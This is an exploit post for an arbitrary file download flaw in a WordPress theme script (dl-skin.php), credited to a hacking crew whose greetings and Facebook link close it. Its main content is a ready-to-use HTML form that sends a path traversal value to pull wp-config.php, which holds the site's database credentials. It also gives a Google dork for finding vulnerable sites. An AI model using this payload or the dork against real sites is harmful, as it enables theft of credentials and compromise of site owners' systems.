facebook facebook twitter rss

WordPress Themes Arbitrary File Download vulnerability

Author: OniXeeMa , Published: 08-06-2015
# Exploit Titre: WordPress Themes Arbitrary File Download vulnerability
# Google Dork: dl-skin.php "index of"
# Date: 06/06/2015
# Exploit Auteur: OniXeeMa
# Software lien: https://wordpress.org/plugins/elegant-themes-icons/
# Version: Les Dernière version --< 4.2.2
# Testé sur: Linux

Exploit :

<html>

<body>

<form action="http://localhost/wp-content/themes/elegance/lib/scripts/dl-skin.php" method="POST">

<b>File</b>:<input type="text" name="_mysite_download_skin" value="../../../../../wp-config.php"><br>

<input type="submit" value=Download>

</form>

</body>
-------------------------------------------------------------------------------
Greetz to : $ xagent .. di4blo .. Gang Dz .. dr sql .. Jotkartxob .. s@mi 0ff .. Djamel11154 .. capoo lionel .. ombre .. AnonJoker .. Admeral zino $
And All RTH Members !
Contact us : https://www.facebook.com/RTHT34M

Like us on Facebook :